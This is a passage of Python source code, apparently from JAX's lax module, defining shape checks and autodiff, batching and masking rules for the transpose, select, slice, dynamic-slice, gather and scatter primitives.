raise TypeError(msg.format(type(permutation)))
if tuple(sorted(permutation)) != tuple(range(operand.ndim)):
msg = ("transpose permutation isn't a permutation of operand dimensions, "
"got permutation {} for operand shape {}.")
raise TypeError(msg.format(permutation, operand.shape))
return tuple(np.take(operand.shape, permutation))
def _transpose_batch_rule(batched_args, batch_dims, *, permutation):
operand, = batched_args
bdim, = batch_dims
perm = (bdim,) + tuple(i if i < bdim else i+1 for i in permutation)
return transpose(operand, perm), 0
def _transpose_masking_rule(padded_vals, logical_shapes, permutation):
return transpose(*padded_vals, permutation=permutation)
transpose_p = standard_primitive(_transpose_shape_rule, _input_dtype,
'transpose')
transpose_p.def_impl(_transpose_impl)
ad.deflinear2(transpose_p,
lambda t, _, permutation: [transpose(t, np.argsort(permutation))]) # type: ignore[arg-type]
batching.primitive_batchers[transpose_p] = _transpose_batch_rule
masking.masking_rules[transpose_p] = _transpose_masking_rule
def _select_shape_rule(pred, on_true, on_false):
if on_true.shape != on_false.shape:
msg = "select on_true and on_false must have the same shape, got {} and {}."
raise TypeError(msg.format(on_true.shape, on_false.shape))
if pred.shape and pred.shape != on_true.shape:
msg = ("select pred must be scalar or have the same shape as on_true and "
"on_false, got pred shape {} for on_true and on_false of shape {}.")
raise TypeError(msg.format(pred.shape, on_true.shape))
return on_true.shape
def _select_dtype_rule(pred, on_true, on_false):
_check_same_dtypes("select", False, on_true.dtype, on_false.dtype)
if not dtypes.issubdtype(pred.dtype, np.bool_):
msg = "select pred must be boolean type, got {}."
raise TypeError(msg.format(pred.dtype))
return on_true.dtype
def _select_transpose_rule(t, pred, on_true, on_false):
assert not ad.is_undefined_primal(pred)
if type(t) is ad_util.Zero:
return [None,
ad_util.Zero(on_true.aval) if ad.is_undefined_primal(on_true) else None,
ad_util.Zero(on_false.aval) if ad.is_undefined_primal(on_false) else None]
else:
zeros = full_like(t, 0)
return [None,
select(pred, t, zeros) if ad.is_undefined_primal(on_true) else None,
select(pred, zeros, t) if ad.is_undefined_primal(on_false) else None]
def _select_batch_rule(batched_args, batch_dims, **unused_kwargs):
pred, on_true, on_false, = batched_args
pred_bdim, ot_bdim, of_bdim = batch_dims
size = next(x.shape[i] for x, i in zip(batched_args, batch_dims)
if i is not None)
# avoid transposes and some broadcasts in special cases
if pred_bdim == ot_bdim == of_bdim:
if np.shape(pred) == np.shape(on_true):
return select(pred, on_true, on_false), pred_bdim
else:
# vmapped function had a scalar pred with nonscalar args
assert np.ndim(pred) == 1
pred = broadcast_in_dim(pred, on_true.shape, [pred_bdim])
return select(pred, on_true, on_false), pred_bdim
elif np.ndim(pred) == 0 and ot_bdim is not None and of_bdim is not None:
if ot_bdim == of_bdim:
return select(pred, on_true, on_false), ot_bdim
elif np.shape(on_true) == np.shape(on_false):
on_false = batching.moveaxis(on_false, of_bdim, ot_bdim)
return select(pred, on_true, on_false), ot_bdim
pred = batching.bdim_at_front(pred, pred_bdim, size) if np.shape(pred) else pred
if not np.shape(on_true) == np.shape(on_false) == ():
on_true = batching.bdim_at_front(on_true, ot_bdim, size)
on_false = batching.bdim_at_front(on_false, of_bdim, size)
assert np.shape(on_true) == np.shape(on_false)
if 0 < np.ndim(pred) < np.ndim(on_true):
# vmapped function had a scalar pred with nonscalar args
assert np.ndim(pred) == 1
pred = broadcast_in_dim(pred, on_true.shape, [0])
if np.ndim(pred) > np.ndim(on_true):
assert np.ndim(on_true) == 0
on_true = broadcast(on_true, pred.shape)
on_false = broadcast(on_false, pred.shape)
return select(pred, on_true, on_false), 0
def _select_masking_rule(padded_vals, logical_shapes):
pred_shape, true_shape, false_shape = [
masking.padded_shape_as_value(val.shape) for val in padded_vals]
assert np.array_equal(pred_shape, true_shape)
assert np.array_equal(pred_shape, false_shape)
return select(*padded_vals)
def _select_jvp(primals, tangents):
pred, on_true, on_false = primals
_, on_true_dot, on_false_dot = tangents
out = select(pred, on_true, on_false)
if type(on_true_dot) is ad_util.Zero:
out_dot = select(pred, _zeros(on_false_dot), on_false_dot)
elif type(on_false_dot) is ad_util.Zero:
out_dot = select(pred, on_true_dot, _zeros(on_true_dot))
else:
out_dot = select(pred, on_true_dot, on_false_dot)
return out, out_dot
select_p = standard_primitive(_select_shape_rule, _select_dtype_rule, 'select',
weak_type_rule=_argnum_weak_type(1, 2))
ad.primitive_jvps[select_p] = _select_jvp
ad.primitive_transposes[select_p] = _select_transpose_rule
batching.primitive_batchers[select_p] = _select_batch_rule
masking.masking_rules[select_p] = _select_masking_rule
def _slice_shape_rule(operand, *, start_indices, limit_indices, strides):
_check_shapelike("slice", "start_indices", start_indices)
_check_shapelike("slice", "limit_indices", limit_indices)
if operand.ndim != len(start_indices):
msg = ("slice start_indices must have length equal to the number of "
"dimensions of the operand, got indices {} for operand shape {}.")
raise TypeError(msg.format(start_indices, operand.shape))
if len(start_indices) != len(limit_indices):
msg = ("slice limit_indices must have the same length as start_indices, "
"got start_inidices {} and limit_indices {}.")
raise TypeError(msg.format(start_indices, limit_indices))
if (not masking.is_polymorphic(limit_indices) and
not masking.is_polymorphic(operand.shape) and
not np.all(np.less_equal(limit_indices, operand.shape))):
msg = ("slice limit_indices must be less than or equal to operand shape, "
"got limit_indices {} for operand shape {}.")
raise TypeError(msg.format(limit_indices, operand.shape))
if not np.all(np.greater_equal(start_indices, 0)):
msg = ("slice start_indices must be greater than or equal to zero, "
"got start_indices of {}.")
raise TypeError(msg.format(start_indices))
if (not masking.is_polymorphic(limit_indices) and
not np.all(np.greater_equal(limit_indices, start_indices))):
msg = ("slice limit_indices must be greater than or equal to start_indices,"
" got start_indices {} and limit_indices {}.")
raise TypeError(msg.format(start_indices, limit_indices))
if strides is None:
strides = np.ones(operand.ndim, np.int32)
else:
_check_shapelike("slice", "strides", strides)
if len(strides) != operand.ndim:
msg = ("slice strides must have length equal to the number of dimensions "
"of the operand, got strides {} for operand shape {}.")
raise TypeError(msg.format(strides, operand.shape))
if not np.all(np.greater(strides, 0)):
msg = "slice strides must be positive, got {}"
raise TypeError(msg.format(strides))
diff = np.subtract(limit_indices, start_indices)
  # Not np.divmod since Poly.__rdivmod__ is ignored by NumPy, which would
  # break strides over polymorphic (Poly) dimensions.
return tuple(q + (r > 0) for q, r in map(divmod, diff, strides))
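# Worked example (illustrative only): with start_indices=(1,),
# limit_indices=(8,) and strides=(2,), diff = (7,) and divmod(7, 2) = (3, 1),
# so the output extent is 3 + 1 = 4, matching the selected indices 1, 3, 5, 7.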
def _slice_translation_rule(c, operand, *, start_indices, limit_indices,
strides):
return xops.Slice(operand, start_indices, limit_indices,
strides or [1] * len(start_indices))
def _slice_transpose_rule(t, operand, *, start_indices, limit_indices, strides):
assert ad.is_undefined_primal(operand)
operand_shape = operand.aval.shape
if strides is None or np.all(np.equal(strides, 1)):
pads = zip(start_indices, np.subtract(operand_shape, limit_indices),
(0,) * len(start_indices))
else:
real_limits = np.add(
start_indices,
np.where(np.array(t.shape) == 0, 0,
np.add(1, np.multiply(np.subtract(t.shape, 1), strides))))
pads = safe_zip(start_indices, np.subtract(operand_shape, real_limits),
np.subtract(strides, 1))
result = pad(t, _const(t, 0), pads)
assert result.shape == operand_shape, (
f"result.shape={result.shape} operand_shape={operand_shape}")
return [result]
def _slice_batching_rule(batched_args, batch_dims, *, start_indices,
limit_indices, strides):
operand, = batched_args
bdim, = batch_dims
new_start_indices = list(start_indices)
new_start_indices.insert(bdim, 0)
new_limit_indices = list(limit_indices)
new_limit_indices.insert(bdim, operand.shape[bdim])
if strides is None:
new_strides = None
else:
new_strides = list(strides)
new_strides.insert(bdim, 1)
out = slice(operand, new_start_indices, new_limit_indices, new_strides)
return out, bdim
def _slice_masking_rule(
padded_vals, logical_shapes, start_indices, limit_indices, strides):
operand, = padded_vals
strides = masking.padded_shape_as_value(strides) if strides else None
return slice(operand,
start_indices=masking.padded_shape_as_value(start_indices),
limit_indices=masking.padded_shape_as_value(limit_indices),
strides=strides)
slice_p = standard_primitive(_slice_shape_rule, _input_dtype, 'slice',
_slice_translation_rule)
ad.deflinear2(slice_p, _slice_transpose_rule)
batching.primitive_batchers[slice_p] = _slice_batching_rule
masking.masking_rules[slice_p] = _slice_masking_rule
def _dynamic_slice_shape_rule(operand, *start_indices, slice_sizes):
if operand.ndim != len(start_indices):
msg = ("dynamic_slice start_indices must have length equal to the number "
"of dimensions of the operand, got indices {} for operand shape {}.")
raise TypeError(msg.format(start_indices, operand.shape))
if len(start_indices) != len(slice_sizes):
msg = ("dynamic_slice slice_sizes must have the same length as "
"start_indices, got start_inidices length {} and slice_sizes {}.")
raise TypeError(msg.format(len(start_indices), slice_sizes))
if not np.all(np.less_equal(slice_sizes, operand.shape)):
msg = ("slice slice_sizes must be less than or equal to operand shape, "
"got slice_sizes {} for operand shape {}.")
raise TypeError(msg.format(slice_sizes, operand.shape))
if not np.all(np.greater_equal(slice_sizes, 0)):
msg = ("slice slice_sizes must be greater than or equal to zero, "
"got slice_sizes of {}.")
raise TypeError(msg.format(slice_sizes))
return tuple(slice_sizes)
def _dynamic_slice_dtype_rule(operand, *start_indices, slice_sizes):
if any(i.dtype != start_indices[0].dtype or
not dtypes.issubdtype(i.dtype, np.integer) for i in start_indices):
msg = ("index arguments to dynamic_slice must be integers of the same "
"type, got: {}")
raise TypeError(msg.format(", ".join(i.dtype.name for i in start_indices)))
return operand.dtype
def _dynamic_slice_translation_rule(c, operand, *start_indices, slice_sizes):
return xops.DynamicSlice(operand, start_indices, slice_sizes)
def _dynamic_slice_jvp(primals, tangents, *, slice_sizes):
tangent_out = tangents[0]
if type(tangent_out) is not ad_util.Zero:
tangent_out = dynamic_slice(tangent_out, primals[1:], slice_sizes)
return dynamic_slice(primals[0], primals[1:], slice_sizes), tangent_out
def _dynamic_slice_transpose_rule(t, operand, *start_indices, slice_sizes):
assert ad.is_undefined_primal(operand)
assert all(not ad.is_undefined_primal(s) for s in start_indices)
operand_shape, operand_dtype = operand.aval.shape, operand.aval.dtype
if type(t) is ad_util.Zero:
return [ad_util.Zero(operand.aval)] + [None] * len(start_indices)
else:
if config.omnistaging_enabled:
zeros = full(operand_shape, 0, operand_dtype)
else:
zeros = full(operand_shape, tie_in(t, _zero(t)))
return ([dynamic_update_slice(zeros, t, start_indices)] +
[None] * len(start_indices))
def _batch_dynamic_slice_indices(indices, bdims):
if len(indices) == 0:
return np.array([], 'int32'), None
size = next((x.shape[i] for x, i in zip(indices, bdims) if i is not None), -1)
if size < 0:
return concatenate([broadcast(i, (1,)) for i in indices], 0), None
indices = concatenate(
[broadcast_in_dim(x, (size, 1),
broadcast_dimensions=((0,) if i is not None else ()))
for x, i in zip(indices, bdims)],
dimension=1)
return indices, 0
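# Worked example (illustrative only): for two scalar start indices with batch
# dims (0, None) and a batch of size 7, the batched index is broadcast to
# shape (7, 1), the unbatched one is broadcast to (7, 1) as well, and the two
# are concatenated along dimension 1 into a single (7, 2) index array whose
# batch dimension is 0.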
def _dynamic_slice_batching_rule(batched_args, batch_dims, *, slice_sizes):
# A dynamic slice is a special case of gather; we can delegate to the gather
# batching rule.
# TODO(phawkins): consider removing dynamic_slice entirely and using gather
# always.
operand, *start_indices = batched_args
operand_bd, *start_idx_bds = batch_dims
operand_shape = (operand.shape if operand_bd is batching.not_mapped
else tuple(np.delete(operand.shape, operand_bd)))
dims = tuple(range(len(operand_shape)))
dnums = GatherDimensionNumbers(offset_dims=dims, collapsed_slice_dims=(),
start_index_map=dims)
index, index_bdim = _batch_dynamic_slice_indices(start_indices, start_idx_bds)
return _gather_batching_rule(
[operand, index], [operand_bd, index_bdim], dimension_numbers=dnums,
slice_sizes=slice_sizes)
dynamic_slice_p = standard_primitive(
_dynamic_slice_shape_rule, _dynamic_slice_dtype_rule, 'dynamic_slice',
_dynamic_slice_translation_rule, weak_type_rule=_argnum_weak_type(0))
ad.primitive_jvps[dynamic_slice_p] = _dynamic_slice_jvp # TODO
ad.primitive_transposes[dynamic_slice_p] = _dynamic_slice_transpose_rule
batching.primitive_batchers[dynamic_slice_p] = _dynamic_slice_batching_rule
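# A minimal usage sketch (illustrative only; assumes `jax.numpy as jnp` and
# that this module is importable as `lax`):
#
#   lax.dynamic_slice(jnp.arange(5), (1,), (2,))   # -> [1, 2]
#
# Unlike static slice, the start indices are traced values; XLA clamps them
# so the requested slice_sizes always fit inside the operand.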
def _dynamic_update_slice_shape_rule(operand, update, *start_indices):
if operand.ndim != update.ndim:
msg = ("dynamic_update_slice update must have the same rank as operand, "
"got update shape {} for operand shape {}.")
raise TypeError(msg.format(update.shape, operand.shape))
if operand.ndim != len(start_indices):
msg = ("dynamic_update_slice start_indices must have length equal to the "
"rank of operand, got indices {} for operand shape {}.")
raise TypeError(msg.format(start_indices, operand.shape))
if not np.all(np.less_equal(update.shape, operand.shape)):
msg = ("dynamic_update_slice update shape must be smaller than operand "
"shape, got update shape {} for operand shape {}.")
raise TypeError(msg.format(update.shape, operand.shape))
return operand.shape
def _dynamic_update_slice_dtype_rule(operand, update, *start_indices):
_check_same_dtypes("dynamic_update_slice", False, operand.dtype, update.dtype)
if any(i.dtype != start_indices[0].dtype or
not dtypes.issubdtype(i.dtype, np.integer) for i in start_indices):
msg = ("index arguments to dynamic_update_slice must be integers of the "
"same type, got {}")
raise TypeError(msg.format(", ".join(i.dtype.name for i in start_indices)))
return operand.dtype
def _dynamic_update_slice_jvp(primals, tangents):
operand, update = primals[:2]
start_indices = primals[2:]
g_operand, g_update = tangents[:2]
val_out = dynamic_update_slice(operand, update, start_indices)
if type(g_operand) is ad_util.Zero and type(g_update) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
g_operand = ad.instantiate_zeros(g_operand)
g_update = ad.instantiate_zeros(g_update)
tangent_out = dynamic_update_slice(g_operand, g_update, start_indices)
return val_out, tangent_out
def _dynamic_update_slice_transpose_rule(t, operand, update, *start_indices):
assert all(not ad.is_undefined_primal(x) for x in start_indices)
if ad.is_undefined_primal(update):
update_shape = update.aval.shape
else:
update_shape = update.shape
if type(t) is ad_util.Zero:
operand_t = ad_util.Zero(operand.aval) if ad.is_undefined_primal(operand) else None
update_t = ad_util.Zero(update.aval) if ad.is_undefined_primal(update) else None
else:
dus = dynamic_update_slice
ds = dynamic_slice
zeros = _zeros(t, shape=update_shape)
operand_t = dus(t, zeros, start_indices) if ad.is_undefined_primal(operand) else None
update_t = ds(t, start_indices, update_shape) if ad.is_undefined_primal(update) else None
return [operand_t, update_t] + [None] * len(start_indices)
def _dynamic_update_slice_translation_rule(c, operand, update, *start_indices):
return xops.DynamicUpdateSlice(operand, update, start_indices)
def _dynamic_update_slice_batching_rule(batched_args, batch_dims):
# A dynamic update slice is a special case of scatter; we can delegate to the
# scatter batching rule.
# TODO(phawkins): consider removing dynamic_update_slice entirely and using
# scatter always.
operand, update, *start_idx = batched_args
operand_bd, update_bd, *start_idx_bd = batch_dims
update_shape = (np.shape(update) if update_bd is batching.not_mapped
else tuple(np.delete(np.shape(update), update_bd)))
dims = tuple(range(len(update_shape)))
dnums = ScatterDimensionNumbers(update_window_dims=dims,
inserted_window_dims=(),
scatter_dims_to_operand_dims=dims)
index, index_bdim = _batch_dynamic_slice_indices(start_idx, start_idx_bd)
return _scatter_batching_rule(
scatter, (operand, index, update), (operand_bd, index_bdim, update_bd),
update_jaxpr=None, update_consts=None, dimension_numbers=dnums,
indices_are_sorted=True, unique_indices=True)
dynamic_update_slice_p = standard_primitive(
_dynamic_update_slice_shape_rule, _dynamic_update_slice_dtype_rule,
'dynamic_update_slice', _dynamic_update_slice_translation_rule)
ad.primitive_jvps[dynamic_update_slice_p] = _dynamic_update_slice_jvp
ad.primitive_transposes[dynamic_update_slice_p] = \
_dynamic_update_slice_transpose_rule
batching.primitive_batchers[dynamic_update_slice_p] = \
_dynamic_update_slice_batching_rule
def _gather_dimensions_proto(indices_shape, dimension_numbers):
assert type(dimension_numbers) is GatherDimensionNumbers
proto = xla_client.GatherDimensionNumbers()
proto.offset_dims.extend(dimension_numbers.offset_dims)
proto.collapsed_slice_dims.extend(dimension_numbers.collapsed_slice_dims)
proto.start_index_map.extend(dimension_numbers.start_index_map)
assert indices_shape.rank() > 0
proto.index_vector_dim = indices_shape.rank() - 1
return proto
def _gather_dtype_rule(operand, start_indices, **kwargs):
if not dtypes.issubdtype(start_indices.dtype, np.integer):
raise ValueError("start_indices must have an integer type")
return dtypes.canonicalize_dtype(operand.dtype)
_rank = lambda arr: len(arr.shape)
def _is_sorted(dims, op_name, name):
for i in range(1, len(dims)):
if dims[i] < dims[i - 1]:
raise TypeError(f"{name} in {op_name} op must be sorted; got {dims}")
def _sorted_dims_in_range(dims, rank, op_name, name):
if len(dims) == 0:
return
invalid_dim = None
if dims[0] < 0:
invalid_dim = dims[0]
elif dims[-1] >= rank:
invalid_dim = dims[-1]
  if invalid_dim is not None:
raise TypeError(f"Invalid {name} set in {op_name} op; valid range is "
f"[0, {rank}); got: {invalid_dim}.")
def _no_duplicate_dims(dims, op_name, name):
if len(set(dims)) != len(dims):
raise TypeError(f"{name} in {op_name} op must not repeat; got: {dims}.")
def _gather_shape_rule(operand, start_indices, *, dimension_numbers,
slice_sizes):
"""Validates the well-formedness of the arguments to Gather.
The code implements the checks based on the detailed operation semantics of
XLA's `Gather <https://www.tensorflow.org/xla/operation_semantics#gather>`_
operator and following the outline of the implementation of
ShapeInference::InferGatherShape in TensorFlow.
"""
offset_dims = dimension_numbers.offset_dims
collapsed_slice_dims = dimension_numbers.collapsed_slice_dims
start_index_map = dimension_numbers.start_index_map
# Note: in JAX, index_vector_dim is always computed as below, cf. the
# documentation of the GatherDimensionNumbers class.
index_vector_dim = _rank(start_indices) - 1
# This case should never happen in JAX, due to the implicit construction of
# index_vector_dim, but is included for completeness.
if _rank(start_indices) < index_vector_dim or index_vector_dim < 0:
raise TypeError(f"Gather index leaf dimension must be within [0, rank("
f"start_indices) + 1). rank(start_indices) is "
f"{_rank(start_indices)} and gather index leaf dimension "
f"is {index_vector_dim}.")
expanded_start_indices_shape = list(start_indices.shape)
# This case should never happen in JAX, due to the implicit construction of
# index_vector_dim, but is included for completeness.
if len(expanded_start_indices_shape) == index_vector_dim:
expanded_start_indices_shape.append(1)
# Start ValidateGatherDimensions
  # In the error messages output by XLA, "offset_dims" is called "Output
  # window dimensions". For consistency's sake, our error messages stick to
  # "offset_dims".
_is_sorted(offset_dims, "gather", "offset_dims")
_no_duplicate_dims(offset_dims, "gather", "offset_dims")
output_offset_dim_count = len(offset_dims)
output_shape_rank = len(offset_dims) + _rank(start_indices) - 1
for i in range(output_offset_dim_count):
offset_dim = offset_dims[i]
if offset_dim < 0 or offset_dim >= output_shape_rank:
raise TypeError(f"Offset dimension {i} in gather op is out of bounds; "
f"got {offset_dim}, but should have been in "
f"[0, {output_shape_rank})")
if len(start_index_map) != start_indices.shape[index_vector_dim]:
raise TypeError(f"Gather op has {len(start_index_map)} elements in "
f"start_index_map and the bound of dimension "
f"index_vector_dim={index_vector_dim} of start_indices is "
f"{start_indices.shape[index_vector_dim]}. These two "
f"numbers must be equal.")
for i in range(len(start_index_map)):
operand_dim_for_start_index_i = start_index_map[i]
if (operand_dim_for_start_index_i < 0 or
operand_dim_for_start_index_i >= _rank(operand)):
raise TypeError(f"Invalid start_index_map; domain is "
f"[0, {_rank(operand)}), got: "
f"{i}->{operand_dim_for_start_index_i}.")
_no_duplicate_dims(start_index_map, "gather", "start_index_map")
# _is_sorted and _sorted_dims_in_range are checked in the opposite order
# compared to the XLA implementation. In cases when the input is not sorted
# AND there are problematic collapsed_slice_dims, the error message will thus
# be different.
_is_sorted(collapsed_slice_dims, "gather", "collapsed_slice_dims")
_sorted_dims_in_range(collapsed_slice_dims, _rank(operand), "gather",
"collapsed_slice_dims")
_no_duplicate_dims(collapsed_slice_dims, "gather", "collapsed_slice_dims")
# End ValidateGatherDimensions
if _rank(operand) != len(slice_sizes):
raise TypeError(f"Gather op must have one slice size for every input "
f"dimension; got: len(slice_sizes)={len(slice_sizes)}, "
f"input_shape.rank={_rank(operand)}")
if len(slice_sizes) != len(offset_dims) + len(collapsed_slice_dims):
raise TypeError(f"All components of the offset index in a gather op must "
f"either be a offset dimension or explicitly collapsed; "
f"got len(slice_sizes)={len(slice_sizes)}, "
f"output_slice_sizes={offset_dims}, collapsed_slice_dims="
f"{collapsed_slice_dims}.")
for i in range(len(slice_sizes)):
slice_size = slice_sizes[i]
corresponding_input_size = operand.shape[i]
if slice_size < 0 or slice_size > corresponding_input_size:
raise TypeError(f"Slice size at index {i} in gather op is out of range, "
f"must be within [0, {corresponding_input_size + 1}), "
f"got {slice_size}.")
for i in range(len(collapsed_slice_dims)):
bound = slice_sizes[collapsed_slice_dims[i]]
if bound > 1:
raise TypeError(f"Gather op can only collapse slice dims with bound 1 "
f"or 0, but bound is {bound} for index "
f"{collapsed_slice_dims[i]} at position {i}.")
expanded_start_indices_shape.pop(index_vector_dim)
start_indices_shape = iter(expanded_start_indices_shape)
slice_sizes = iter(np.delete(slice_sizes, collapsed_slice_dims))
return tuple(next(slice_sizes) if i in offset_dims
else next(start_indices_shape) for i in range(output_shape_rank))
def _gather_translation_rule(c, operand, start_indices, *, dimension_numbers,
slice_sizes):
indices_shape = c.get_shape(start_indices)
return xops.Gather(
operand, start_indices,
_gather_dimensions_proto(indices_shape, dimension_numbers), slice_sizes,
indices_are_sorted=False)
def _gather_jvp_rule(g, operand, start_indices, *, dimension_numbers,
slice_sizes):
return gather(g, start_indices, dimension_numbers, slice_sizes)
def _gather_transpose_rule(t, operand, start_indices, *, dimension_numbers,
slice_sizes):
assert ad.is_undefined_primal(operand)
operand_shape = operand.aval.shape
if type(t) is ad_util.Zero:
out = ad_util.Zero(operand.aval)
else:
if config.omnistaging_enabled:
zeros = full(operand_shape, _zero(t))
else:
zeros = full(operand_shape, tie_in(t, _zero(t)))
scatter_dnums = ScatterDimensionNumbers(
update_window_dims=dimension_numbers.offset_dims,
inserted_window_dims=dimension_numbers.collapsed_slice_dims,
scatter_dims_to_operand_dims=dimension_numbers.start_index_map)
out = scatter_add(zeros, start_indices, t, scatter_dnums,
indices_are_sorted=False,
unique_indices=False)
return [out, None]
def _gather_batching_rule(batched_args, batch_dims, *, dimension_numbers,
slice_sizes):
operand, start_indices = batched_args
operand_bdim, start_indices_bdim = batch_dims
if operand_bdim is not None and start_indices_bdim is None:
operand = batching.moveaxis(operand, operand_bdim, 0)
slice_sizes = (operand.shape[0],) + slice_sizes
offset_dims = (0,) + tuple(np.add(1, dimension_numbers.offset_dims))
collapsed_slice_dims = tuple(np.add(1, dimension_numbers.collapsed_slice_dims))
start_index_map = tuple(np.add(1, dimension_numbers.start_index_map))
dnums = GatherDimensionNumbers(
offset_dims=offset_dims,
collapsed_slice_dims=collapsed_slice_dims,
start_index_map=start_index_map)
return gather(operand, start_indices, dimension_numbers=dnums,
slice_sizes=slice_sizes), 0
elif operand_bdim is None and start_indices_bdim is not None:
start_indices = batching.moveaxis(start_indices, start_indices_bdim, 0)
offset_dims = tuple(np.add(1, dimension_numbers.offset_dims))
dnums = GatherDimensionNumbers(
offset_dims=offset_dims,
collapsed_slice_dims=dimension_numbers.collapsed_slice_dims,
start_index_map=dimension_numbers.start_index_map)
return gather(operand, start_indices, dimension_numbers=dnums,
slice_sizes=slice_sizes), 0
else:
# move batch dimensions to the front to simplify logic
operand = batching.moveaxis(operand, operand_bdim, 0)
start_indices = batching.moveaxis(start_indices, start_indices_bdim, 0)
# Example: user code had start_indices shape (3, 4, 5), and we have to deal
# with start_indices shape (7, 3, 4, 5). We transform that to a
# start_indices of shape (7, 3, 4, 6) where we concatenated an iota that
# counts along our batch dimension to the front of the ndindex.
count_shape = list(start_indices.shape)
count_shape[-1] = 1
counts = broadcasted_iota(start_indices.dtype, tuple(count_shape), 0)
start_indices = concatenate([counts, start_indices], len(count_shape) - 1)
slice_sizes = (_min(operand.shape[0], 1),) + slice_sizes
collapsed_slice_dims = (0,) + tuple(np.add(1, dimension_numbers.collapsed_slice_dims))
offset_dims = tuple(np.add(1, dimension_numbers.offset_dims))
start_index_map = (0,) + tuple(np.add(1, dimension_numbers.start_index_map))
dnums = GatherDimensionNumbers(
offset_dims=offset_dims,
collapsed_slice_dims=collapsed_slice_dims,
start_index_map=start_index_map)
return gather(operand, start_indices, dimension_numbers=dnums,
slice_sizes=slice_sizes), 0
gather_p = standard_primitive(
_gather_shape_rule, _gather_dtype_rule, 'gather',
_gather_translation_rule, weak_type_rule=_argnum_weak_type(0))
ad.defjvp(gather_p, _gather_jvp_rule, None)
ad.primitive_transposes[gather_p] = _gather_transpose_rule
batching.primitive_batchers[gather_p] = _gather_batching_rule
def _scatter_dimensions_proto(indices_shape, dimension_numbers):
assert type(dimension_numbers) is ScatterDimensionNumbers
proto = xla_client.ScatterDimensionNumbers()
proto.update_window_dims.extend(dimension_numbers.update_window_dims)
proto.inserted_window_dims.extend(dimension_numbers.inserted_window_dims)
proto.scatter_dims_to_operand_dims.extend(
dimension_numbers.scatter_dims_to_operand_dims)
assert indices_shape.rank() > 0
proto.index_vector_dim = indices_shape.rank() - 1
return proto
def _scatter_dtype_rule(operand, scatter_indices, updates, **kwargs):
if not dtypes.issubdtype(scatter_indices.dtype, np.integer):
raise ValueError("scatter_indices must have an integer type")
_check_same_dtypes("scatter", False, operand.dtype, updates.dtype)
return dtypes.canonicalize_dtype(operand.dtype)
def _scatter_shape_rule(operand, scatter_indices, updates, *, update_jaxpr,
update_consts, dimension_numbers, indices_are_sorted,
unique_indices):
"""Validates the well-formedness of the ``dimension_numbers`` argument to
Scatter.
The code implements the checks based on the detailed operation semantics of
XLA's `Scatter <https://www.tensorflow.org/xla/operation_semantics#scatter>`_
operator and following the outline of the implementation of
ShapeInference::InferScatterShape in TensorFlow.
"""
update_window_dims = dimension_numbers.update_window_dims
inserted_window_dims = dimension_numbers.inserted_window_dims
scatter_dims_to_operand_dims = dimension_numbers.scatter_dims_to_operand_dims
# Note: in JAX, index_vector_dim is always computed as below, cf. the
# documentation of the ScatterDimensionNumbers class.
index_vector_dim = _rank(scatter_indices) - 1
# This case should never happen in JAX, due to the implicit construction of
# index_vector_dim, but is included for completeness.
if _rank(scatter_indices) < index_vector_dim or index_vector_dim < 0:
raise TypeError(f"Scatter index leaf dimension must be within [0, "
f"rank(scatter_indices) + 1). rank(scatter_indices) is "
f"{_rank(scatter_indices)} and scatter index leaf "
f"dimension is {index_vector_dim}.")
expanded_scatter_indices_shape = list(scatter_indices.shape)
# This case should never happen in JAX, due to the implicit construction of
# index_vector_dim, but is included for completeness.
if len(expanded_scatter_indices_shape) == index_vector_dim:
expanded_scatter_indices_shape.append(1)
expected_updates_rank = (len(expanded_scatter_indices_shape) - 1 +
len(update_window_dims))
if _rank(updates) != expected_updates_rank:
raise TypeError(f"Updates tensor must be of rank {expected_updates_rank}; "
f"got {_rank(updates)}.")
# Validate update_window_dims
_is_sorted(update_window_dims, "scatter", "update_window_dims")
_no_duplicate_dims(update_window_dims, "scatter", "update_window_dims")
_sorted_dims_in_range(update_window_dims, _rank(updates), "scatter",
"update_window_dims")
# Validate inserted_window_dims
_is_sorted(inserted_window_dims, "scatter", "inserted_window_dims")
_no_duplicate_dims(inserted_window_dims, "scatter", "inserted_window_dims")
_sorted_dims_in_range(inserted_window_dims, _rank(operand), "scatter",
"inserted_window_dims")
# Validate window_size
window_size = len(update_window_dims) + len(inserted_window_dims)
if _rank(operand) != window_size:
raise TypeError(f"Scatter op has window of size {window_size}; doesn't "
f"match operand of rank {_rank(operand)}.")
# Validate scatter_dims_to_operand_dims
if (len(scatter_dims_to_operand_dims) !=
scatter_indices.shape[index_vector_dim]):
raise TypeError(f"Scatter op has {len(scatter_dims_to_operand_dims)} "
f"elements in scatter_dims_to_operand_dims and the bound "
f"of dimension index_vector_dim={index_vector_dim} of "
f"scatter_indices is "
f"{scatter_indices.shape[index_vector_dim]}. These two "
f"numbers must be equal")
for i in range(len(scatter_dims_to_operand_dims)):
dim = scatter_dims_to_operand_dims[i]
if dim < 0 or dim >= _rank(operand):
raise TypeError(f"Invalid scatter_dims_to_operand_dims mapping; domain "
f"is [0, {_rank(operand)}), got: {i}->{dim}.")
_no_duplicate_dims(scatter_dims_to_operand_dims, "scatter",
"scatter_dims_to_operand_dims")
max_update_slice_sizes = [operand.shape[i] for i in range(len(operand.shape))
                            if i not in set(inserted_window_dims)]
for i in range(len(update_window_dims)):
update_window_dim = update_window_dims[i]
if updates.shape[update_window_dim] > max_update_slice_sizes[i]:
raise TypeError(f"Bounds of the window dimensions of updates must not "
f"exceed the bounds of the corresponding dimensions of "
f"operand. For dimension {update_window_dim}, updates "
f"bound is {updates.shape[update_window_dim]}, operand "
f"bound is {max_update_slice_sizes[i]}.")
update_scatter_dims = [dim for dim in range(_rank(updates)) if dim not in
set(update_window_dims)]
scatter_dims_seen = 0
for i in update_scatter_dims:
if scatter_dims_seen == index_vector_dim:
scatter_dims_seen += 1
if updates.shape[i] != expanded_scatter_indices_shape[scatter_dims_seen]:
raise TypeError(f"Bounds of the scatter dimensions of updates must be "
f"the same as the bounds of the corresponding dimensions "
f"of scatter indices. For scatter dimension {i}, updates "
f"bound is {updates.shape[i]}, scatter_indices bound is "
f"{expanded_scatter_indices_shape[scatter_dims_seen]}.")
scatter_dims_seen += 1
return operand.shape
def _scatter_translation_rule(c, operand, scatter_indices, updates, *,
update_jaxpr, update_consts, dimension_numbers,
indices_are_sorted, unique_indices):
dtype = c.get_shape(operand).numpy_dtype()
init_value = xb.constant(c, np.array(0, dtype))
update_computation = _reduction_computation(
c, update_jaxpr, update_consts, init_value)
indices_shape = c.get_shape(scatter_indices)
return xops.Scatter(operand, scatter_indices, updates, update_computation,
